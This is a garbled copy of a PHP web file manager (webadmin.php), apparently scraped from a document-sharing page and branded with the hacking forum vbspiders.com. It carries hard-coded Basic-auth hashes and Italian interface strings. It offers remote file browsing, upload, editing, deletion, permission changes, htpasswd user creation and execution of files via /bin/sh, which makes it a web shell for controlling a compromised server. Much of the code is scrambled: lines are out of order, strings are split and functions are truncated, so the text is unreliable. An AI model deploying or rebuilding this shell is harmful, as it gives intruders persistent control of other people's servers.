Professional Documents
Culture Documents
php
$auth = 1;
//user & password = vbspiders.com
$name='f4a8730b5b702cb1788226c600f52b79';
$pass='f4a8730b5b702cb1788226c600f52b79';
if($auth == 1) {
if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['P
HP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
{
header('WWW-Authenticate: Basic realm="vbspiders
.com"');
header('HTTP/1.0 401 Unauthorized');
exit("<b>Wrong Password;</b>");
}
}
if (get_magic_quotes_gpc()) {
array_walk($_GET, 'strip');
array_walk($_POST, 'strip');
array_walk($_REQUEST, 'strip');
}
if (array_key_exists('image', $_GET)) {
header('Content-Type: image/gif');
die(getimage($_GET['image']));
}
if (!function_exists('lstat')) {
function lstat ($filename) {
return stat($filename);
}
}
$delim = DIRECTORY_SEPARATOR;
if (function_exists('php_uname')) {
$win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false;
} else {
$win = ($delim == '\\') ? true : false;
}
if (!empty($_SERVER['PATH_TRANSLATED'])) {
$scriptdir = dirname($_SERVER['PATH_TRANSLATED']);
} elseif (!empty($_SERVER['SCRIPT_FILENAME'])) {
$scriptdir = dirname($_SERVER['SCRIPT_FILENAME']);
} elseif (function_exists('getcwd')) {
$scriptdir = getcwd();
} else {
$scriptdir = '.';
}
$homedir = relative2absolute($homedir, $scriptdir);
$dir = (array_key_exists('dir', $_REQUEST)) ? $_REQUEST['dir'] : $homedir;
$cols = ($win) ? 4 : 7;
if (!isset($dirpermission)) {
$dirpermission = (function_exists('umask')) ? (0777 & ~umask()) : 0755;
}
if (!isset($filepermission)) {
$filepermission = (function_exists('umask')) ? (0666 & ~umask()) : 0644;
}
if (!empty($_SERVER['SCRIPT_NAME'])) {
$self = html(basename($_SERVER['SCRIPT_NAME']));
} elseif (!empty($_SERVER['PHP_SELF'])) {
$self = html(basename($_SERVER['PHP_SELF']));
} else {
$self = '';
}
if (!empty($_SERVER['SERVER_SOFTWARE'])) {
if (strtolower(substr($_SERVER['SERVER_SOFTWARE'], 0, 6)) == 'apache') {
$apache = true;
} else {
$apache = false;
}
} else {
$apache = true;
}
switch ($action) {
case 'view':
if (is_script($file)) {
/* highlight_file is a mess! */
ob_start();
highlight_file($file);
$src = ereg_replace('<font color="([^"]*)">', '<span style="colo
r: \1">', ob_get_contents());
$src = str_replace(array('</font>', "\r", "\n"), array('</span>'
, '', ''), $src);
ob_end_clean();
ile) . '</h2>
html_header();
echo '<h2 style="text-align: left; margin-bottom: 0">' . html($f
<hr />
<table>
<tr>
<td style="text-align: right; vertical-align: top; color: gray; padding-right: 3
pt; border-right: 1px solid gray">
<pre style="margin-top: 0"><code>';
for ($i = 1; $i <= sizeof(file($file)); $i++) echo "$i\n";
echo '</code></pre>
</td>
<td style="text-align: left; vertical-align: top; padding-left: 3pt">
';');
header('Pragma: public');
header('Expires: 0');
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Content-Type: ' . getmimetype($file));
header('Content-Disposition: attachment; filename=' . basename($file) .
header('Content-Length: ' . filesize($file));
readfile($file);
break;
case 'upload':
$dest = relative2absolute($file['name'], $directory);
if (@file_exists($dest)) {
listing_page(error('already_exists', $dest));
} elseif (@move_uploaded_file($file['tmp_name'], $dest)) {
@chmod($dest, $filepermission);
listing_page(notice('uploaded', $file['name']));
} else {
listing_page(error('not_uploaded', $file['name']));
}
break;
case 'create_directory':
if (@file_exists($file)) {
listing_page(error('already_exists', $file));
} else {
$old = @umask(0777 & ~$dirpermission);
if (@mkdir($file, $dirpermission)) {
listing_page(notice('created', $file));
} else {
listing_page(error('not_created', $file));
}
@umask($old);
}
break;
case 'create_file':
if (@file_exists($file)) {
listing_page(error('already_exists', $file));
} else {
$old = @umask(0777 & ~$filepermission);
if (@touch($file)) {
edit($file);
} else {
listing_page(error('not_created', $file));
}
@umask($old);
}
break;
case 'execute':
chdir(dirname($file));
$output = array();
$retval = 0;
exec('echo "./' . basename($file) . '" | /bin/sh', $output, $retval);
$error = ($retval == 0) ? false : true;
');
));
break;
case 'delete':
if (!empty($_POST['no'])) {
listing_page();
} elseif (!empty($_POST['yes'])) {
$failure = array();
$success = array();
foreach ($files as $file) {
if (del($file)) {
$success[] = $file;
} else {
$failure[] = $file;
}
}
$message = '';
if (sizeof($failure) > 0) {
$message = error('not_deleted', implode("\n", $failure))
}
if (sizeof($success) > 0) {
$message .= notice('deleted', implode("\n", $success));
}
listing_page($message);
} else {
html_header();
';
<p>
" />
}
} else {
$name = basename($file);
html_header();
echo '<form action="' . $self . '" method="post">
<table class="dialog">
<tr>
<td class="dialog">
<input type="hidden" name="action" value="rename" />
<input type="hidden" name="file" value="' . html($file) . '" />
<input type="hidden" name="dir" value="' . html($directory) . '" />
<b>' . word('rename_file') . '</b>
<p>' . html($file) . '</p>
<b>' . substr($file, 0, strlen($file) - strlen($name)) . '</b>
<input type="text" name="destination" size="' . textfieldsize($name) . '
" value="' . html($name) . '" />
<hr />
<input type="submit" value="' . word('rename') . '" />
</td>
</tr>
</table>
<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back')
. ' ]</a></p>
</form>
';
html_footer();
}
break;
case 'move':
if (!empty($_POST['destination'])) {
$dest = relative2absolute($_POST['destination'], $directory);
$failure = array();
$success = array();
foreach ($files as $file) {
$filename = substr($file, strlen($directory));
$d = $dest . $filename;
if (!@file_exists($d) && @rename($file, $d)) {
$success[] = $file;
} else {
$failure[] = $file;
}
}
$message = '';
if (sizeof($failure) > 0) {
$message = error('not_moved', implode("\n", $failure), $
dest);
}
if (sizeof($success) > 0) {
$message .= notice('moved', implode("\n", $success), $de
st);
}
listing_page($message);
} else {
html_header();
echo '<form action="' . $self . '" method="post">
<table class="dialog">
<tr>
<td class="dialog">
';
request_dump();
';
<p>
if (@is_dir($dest)) {
$failure = array();
$success = array();
foreach ($files as $file) {
$filename = substr($file, strlen($directory));
$d = addslash($dest) . $filename;
if (!@is_dir($file) && !@file_exists($d) && @cop
y($file, $d)) {
} else {
}
$success[] = $file;
$failure[] = $file;
$message = '';
if (sizeof($failure) > 0) {
$message = error('not_copied', implode("\n", $fa
ilure), $dest);
}
if (sizeof($success) > 0) {
$message .= notice('copied', implode("\n", $succ
ess), $dest);
}
listing_page($message);
} else {
if (!@file_exists($dest) && @copy($file, $dest)) {
listing_page(notice('copied', $file, $dest));
} else {
listing_page(error('not_copied', $file, $dest));
}
}
} else {
html_header();
echo '<form action="' . $self . '" method="post">
<table class="dialog">
<tr>
<td class="dialog">
';
request_dump();
';
<p>
<tr>
if (@chmod($file, $mode)) {
listing_page(notice('permission_set', $file, decoct($mod
e)));
} else {
mode)));
} else {
html_header();
$mode = fileperms($file);
echo '<form action="' . $self . '" method="post">
<table class="dialog">
<tr>
<td class="dialog">
<p style="margin: 0">' . phrase('permission_for', $file) . '</p>
<hr />
/td>
<table id="permission">
<tr>
<td></td>
<td style="border-right: 1px solid black">' . word('owner') . '<
<td style="border-right: 1px solid black">' . word('group') . '<
/td>
</tr>
<tr>
00)
40)
04)
00)
20)
02)
00)
10)
01)
004
000
000
002
000
000
001
000
000
</table>
<hr />
<input type="submit" name="set" value="' . word('set') . '" />
<input type="hidden" name="action" value="permission" />
<input type="hidden" name="file" value="' . html($file) . '" />
<input type="hidden" name="dir" value="' . html($directory) . '" />
</td>
</tr>
</table>
<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back')
. ' ]</a></p>
</form>
';
html_footer();
}
break;
default:
listing_page();
}
/* ------------------------------------------------------------------------- */
function getlist ($directory) {
global $delim, $win;
if ($d = @opendir($directory)) {
while (($filename = @readdir($d)) !== false) {
$path = $directory . $filename;
if ($stat = @lstat($path)) {
$file = array(
'filename'
'path'
'is_file'
'is_dir'
'is_link'
'is_readable'
'is_writable'
'size'
'permission'
'owner'
'group'
'mtime'
'atime'
=>
=>
=>
=>
=>
=>
=>
=>
=>
=>
=>
=>
=>
$filename,
$path,
@is_file($path),
@is_dir($path),
@is_link($path),
@is_readable($path),
@is_writable($path),
$stat['size'],
$stat['mode'],
$stat['uid'],
$stat['gid'],
@filemtime($path),
@fileatime($path),
);
'ctime'
=> @filectime($path)
if ($file['is_dir']) {
$file['is_executable'] = @file_exists($p
} else {
cutable($path);
if (!$win) {
$file['is_executable'] = @is_exe
} else {
$file['is_executable'] = true;
k($path);
if (function_exists('posix_getpwuid')) $file['ow
ner_name'] = @reset(posix_getpwuid($file['owner']));
if (function_exists('posix_getgrgid')) $file['gr
oup_name'] = @reset(posix_getgrgid($file['group']));
$files[] = $file;
}
}
return $files;
} else {
}
return false;
}
function sortlist (&$list, $key, $reverse) {
quicksort($list, 0, sizeof($list) - 1, $key);
if ($reverse) $list = array_reverse($list);
}
function quicksort (&$array, $first, $last, $key) {
if ($first < $last) {
$cmp = $array[floor(($first + $last) / 2)][$key];
$l = $first;
$r = $last;
while ($l <= $r) {
while ($array[$l][$key] < $cmp) $l++;
while ($array[$r][$key] > $cmp) $r--;
if ($l <= $r) {
$tmp = $array[$l];
$array[$l] = $array[$r];
$array[$r] = $tmp;
$l++;
$r--;
}
}
quicksort($array, $first, $r, $key);
quicksort($array, $l, $last, $key);
}
}
function permission_octal2string ($mode) {
if (($mode & 0xC000) === 0xC000) {
$type = 's';
} elseif (($mode & 0xA000) === 0xA000)
$type = 'l';
} elseif (($mode & 0x8000) === 0x8000)
$type = '-';
} elseif (($mode & 0x6000) === 0x6000)
$type = 'b';
} elseif (($mode & 0x4000) === 0x4000)
$type = 'd';
} elseif (($mode & 0x2000) === 0x2000)
$type = 'c';
} elseif (($mode & 0x1000) === 0x1000)
$type = 'p';
} else {
$type = '?';
}
$owner = ($mode & 00400) ? 'r' :
$owner .= ($mode & 00200) ? 'w' :
if ($mode & 0x800) {
$owner .= ($mode & 00100)
} else {
$owner .= ($mode & 00100)
}
'-';
'-';
'-';
'-';
{
{
{
{
{
{
? 's' : 'S';
? 'x' : '-';
? 's' : 'S';
? 'x' : '-';
'image/jpeg',
'image/gif',
'image/png',
'text/html',
'text/plain',
'application/xml',
'application/pdf'
im . $f)) {
$error = true;
}
closedir($dir);
if (!$error) return @rmdir($file);
return !$error;
} else {
}
} else {
return false;
return @unlink($file);
}
}
function addslash ($directory) {
global $delim;
if (substr($directory, -1, 1) != $delim) {
return $directory . $delim;
} else {
return $directory;
}
}
function relative2absolute ($string, $directory) {
if (path_is_relative($string)) {
return simplify_path(addslash($directory) . $string);
} else {
return simplify_path($string);
}
}
function path_is_relative ($path) {
global $win;
if ($win) {
return (substr($path, 1, 1) != ':');
} else {
return (substr($path, 0, 1) != '/');
}
}
function absolute2relative ($directory, $target) {
global $delim;
$path = '';
while ($directory != $target) {
if ($directory == substr($target, 0, strlen($directory))) {
$path .= substr($target, strlen($directory));
break;
} else {
$path .= '..' . $delim;
$directory = substr($directory, 0, strrpos(substr($direc
tory, 0, -1), $delim) + 1);
}
}
if ($path == '') $path = '.';
return $path;
}
function simplify_path ($path) {
global $delim;
if (@file_exists($path) && function_exists('realpath') && @realpath($pat
h) != '') {
$path = realpath($path);
if (@is_dir($path)) {
return addslash($path);
} else {
return $path;
}
e $r = '';
</tr>
';
ry);
if (@is_dir($real_file)) {
echo '[ <a href="' . $self . '?dir=' . u
rlencode($real_file) . '">' . html($file['target']) . '</a> ]';
} else {
echo '<a href="' . $self . '?action=view
&file=' . urlencode($real_file) . '">' . html($file['target']) . '</a>';
}
} else {
echo html($file['target']);
}
} elseif ($file['is_dir']) {
echo '<img src="' . $self . '?image=folder" alt="folder"
/> [ ';
if ($win || $file['is_executable']) {
echo '<a href="' . $self . '?dir=' . urlencode($
file['path']) . '">' . html($file['filename']) . '</a>';
} else {
echo html($file['filename']);
}
echo ' ]';
} else {
if (substr($file['filename'], 0, 1) == '.') {
echo '<img src="' . $self . '?image=hidden_file"
} else {
';
$human = '';
';
echo html(permission_octal2string($file['permission']));
if ($l) echo '</a>';
echo "</td>\n";
if (array_key_exists('owner_name', $file)) {
echo "\t<td class=\"owner\" title=\"uid: {$file[
'owner']}\">{$file['owner_name']}</td>\n";
} else {
echo "\t<td class=\"owner\">{$file['owner']}</td
>\n";
}
if (array_key_exists('group_name', $file)) {
echo "\t<td class=\"group\" title=\"gid: {$file[
'group']}\">{$file['group_name']}</td>\n";
} else {
echo "\t<td class=\"group\">{$file['group']}</td
>\n";
}
}
echo ' <td class="functions">
<input type="hidden" name="file' . $i . '" value="' . html($file
['path']) . '" />
';
$actions = array();
if (function_exists('symlink')) {
$actions[] = 'create_symlink';
}
if (@is_writable(dirname($file['path']))) {
$actions[] = 'delete';
$actions[] = 'rename';
$actions[] = 'move';
}
if ($file['is_file'] && $file['is_readable']) {
$actions[] = 'copy';
$actions[] = 'download';
if ($file['is_writable']) $actions[] = 'edit';
}
if (!$win && function_exists('exec') && $file['is_file'] && $fil
e['is_executable'] && file_exists('/bin/sh')) {
$actions[] = 'execute';
}
if (sizeof($actions) > 0) {
. '" size="1">
';
echo '
tion) . "</option>\n";
echo '
</select>
<input class="small" type="submit" name="submit' . $i . '" value
=" > " onfocus="activate(\'other\')" />
';
}
echo ' </td>
</tr>
';
}
n>\n";
</select>
<input class="small" type="submit" name="submit_all" value=" >
; " onfocus="activate(\'other\')" />
</td>
</tr>
';
}
function directory_choice () {
global $directory, $homedir, $cols, $self;
echo '<tr>
<td colspan="' . $cols . '" id="directory">
<a href="' . $self . '?dir=' . urlencode($homedir) . '">' . word
('directory') . '</a>:
<input type="text" name="dir" size="' . textfieldsize($directory
) . '" value="' . html($directory) . '" onfocus="activate(\'directory\')" />
<input type="submit" name="changedir" value="' . word('change')
. '" onfocus="activate(\'directory\')" />
</td>
</tr>
';
}
function upload_box () {
global $cols;
>
echo '<tr>
<td colspan="' . $cols . '" id="upload">
' . word('file') . ':
<input type="file" name="upload" onfocus="activate(\'other\')" /
)">
\')" />
echo '<tr>
<td colspan="' . $cols . '" id="create">
<select name="create_type" size="1" onfocus="activate(\'create\'
<option value="file">' . word('file') . '</option>
<option value="directory">' . word('directory') . '</option>
</select>
<input type="text" name="create_name" onfocus="activate(\'create
} else {
wd;
$f = fopen($file, 'r');
while (!feof($f)) {
echo html(fread($f, 8192));
}
fclose($f);
if (!empty($_POST['user'])) {
echo "\n" . $_POST['user'] . ':' . crypt($_POST['password']);
}
if (!empty($_POST['basic_auth'])) {
if ($win) {
$authfile = str_replace('\\', '/', $directory) . $htpass
} else {
;\n";
}
echo '</textarea>
';
<hr />
if ($apache && basename($file) == $htpasswd) {
echo '
' . word('user') . ': <input type="text" name="user" />
' . word('password') . ': <input type="password" name="password" />
<input type="submit" value="' . word('add') . '" />
';
<hr />
}
<hr />
}
echo '
<input type="hidden" name="action" value="edit" />
<input type="hidden" name="file" value="' . html($file) . '" />
<input type="hidden" name="dir" value="' . html($directory) . '" />
<input type="reset" value="' . word('reset') . '" id="red_button" />
<input type="submit" name="save" value="' . word('save') . '" id="green_
button" style="margin-left: 50px" />
</td>
</tr>
</table>
<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back')
. ' ]</a></p>
</form>
';
html_footer();
}
function spacer () {
global $cols;
</tr>
';
echo '<tr>
<td colspan="' . $cols . '" style="height: 1em"></td>
}
function textfieldsize ($content) {
$size = strlen($content) + 5;
if ($size < 30) $size = 30;
return $size;
}
function request_dump () {
foreach ($_REQUEST as $key => $value) {
echo "\t<input type=\"hidden\" name=\"" . html($key) . '" value=
"' . html($value) . "\" />\n";
}
}
/* ------------------------------------------------------------------------- */
function html ($string) {
global $site_charset;
return htmlentities($string, ENT_COMPAT, $site_charset);
}
function word ($word) {
global $words, $word_charset;
return htmlentities($words[$word], ENT_COMPAT, $word_charset);
}
function phrase ($phrase, $arguments) {
global $words;
static $search;
if (!is_array($search)) for ($i = 1; $i <= 8; $i++) $search[] = "%$i";
for ($i = 0; $i < sizeof($arguments); $i++) {
}
/b>');
$arguments[$i] = nl2br(html($arguments[$i]));
$replace = array('{' => '<pre>', '}' =>'</pre>', '[' => '<b>', ']' => '<
return array(
'directory' => 'Directory',
'file' => 'File',
'filename' => 'Nome File',
'size' => 'Dimensioni',
'permission' => 'Permessi',
'owner' => 'Proprietario',
'group' => 'Gruppo',
'other' => 'Altro',
'functions' => 'Funzioni',
'read' => 'leggi',
'write' => 'scrivi',
'execute' => 'esegui',
'create_symlink' => 'crea link simbolico',
'delete' => 'cancella',
'rename' => 'rinomina',
'move' => 'sposta',
'copy' => 'copia',
'edit' => 'modifica',
'download' => 'download',
'upload' => 'upload',
'create' => 'crea',
'change' => 'cambia',
'save' => 'salva',
'set' => 'imposta',
'reset' => 'reimposta',
'relative' => 'Percorso relativo per la destinazione',
'yes' => 'Si',
'no' => 'No',
'back' => 'indietro',
'destination' => 'Destinazione',
'symlink' => 'Link simbolico',
'no_output' => 'no output',
'user' => 'User',
'password' => 'Password',
'add' => 'aggiungi',
'add_basic_auth' => 'aggiungi autenticazione base',
'uploaded' => '"[%1]" stato caricato.',
'not_uploaded' => '"[%1]" non stato caricato.',
'already_exists' => '"[%1]" esiste gi.',
'created' => '"[%1]" stato creato.',
'not_created' => '"[%1]" non stato creato.',
'really_delete' => 'Cancello questi file ?',
'deleted' => "Questi file sono stati cancellati:\n[%1]",
'not_deleted' => "Questi file non possono essere cancellati:\n[%1]",
'rename_file' => 'File rinominato:',
'renamed' => '"[%1]" stato rinominato in "[%2]".',
'not_renamed' => '"[%1] non stato rinominato in "[%2]".',
'move_files' => 'Sposto questi file:',
'moved' => "Questi file sono stati spostati in \"[%2]\":\n[%1]",
'not_moved' => "Questi file non possono essere spostati in \"[%2]\":\n[%1]",
'copy_files' => 'Copio questi file',
'copied' => "Questi file sono stati copiati in \"[%2]\":\n[%1]",
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=$site_charset" />
<title>webadmin.php</title>
<style type="text/css">
body { font: small sans-serif; text-align: center }
img { width: 17px; height: 13px }
a, a:visited { text-decoration: none; color: navy }
hr { border-style: none; height: 1px; background-color: silver; color: silver }
#main { margin-top: 6pt; margin-left: auto; margin-right: auto; border-spacing:
1px }
#main th { background: #eee; padding: 3pt 3pt 0pt 3pt }
.listing th, .listing td { padding: 1px 3pt 0 3pt }
.listing th { border: 1px solid silver }
.listing td { border: 1px solid #ddd; background: white }
.listing .checkbox { text-align: center }
.listing .filename { text-align: left }
.listing .size { text-align: right }
.listing .permission_header { text-align: left }
.listing .permission { font-family: monospace }
.listing .owner { text-align: left }
.listing .group { text-align: left }
.listing .functions { text-align: left }
.listing_footer td { background: #eee; border: 1px solid silver }
#directory, #upload, #create, .listing_footer td, #error td, #notice td { text-a
lign: left; padding: 3pt }
#directory { background: #eee; border: 1px solid silver }
#upload { padding-top: 1em }
#create { padding-bottom: 1em }
.small, .small option { font-size: x-small }
textarea { border: none; background: white }
table.dialog { margin-left: auto; margin-right: auto }
td.dialog { background: #eee; padding: 1ex; border: 1px solid silver; text-align
: center }
#permission { margin-left: auto; margin-right: auto }
#permission td { padding-left: 3pt; padding-right: 3pt; text-align: center }
td.permission_action { text-align: right }
#symlink { background: #eee; border: 1px solid silver }
#symlink td { text-align: left; padding: 3pt }
#red_button { width: 120px; color: #400 }
#green_button { width: 120px; color: #040 }
#error td { background: maroon; color: white; border: 1px solid silver }
#notice td { background: green; color: white; border: 1px solid silver }
#notice pre, #error pre { background: silver; color: black; padding: 1ex; margin
-left: 1ex; margin-right: 1ex }
code { font-size: 12pt }
td { white-space: nowrap }
</style>
<script type="text/javascript">
<!-function activate (name) {
if (document && document.forms[0] && document.forms[0].elements['focus']
) {
document.forms[0].elements['focus'].value = name;
}
}
//-->
</script>
</head>
<body>
END;
}
function html_footer () {
echo <<<END
</body>
</html>
END;
}
function notice ($phrase) {
global $cols;
$args = func_get_args();
array_shift($args);
</tr>
';
}
function error ($phrase) {
global $cols;
$args = func_get_args();
array_shift($args);
</tr>
';
}
?>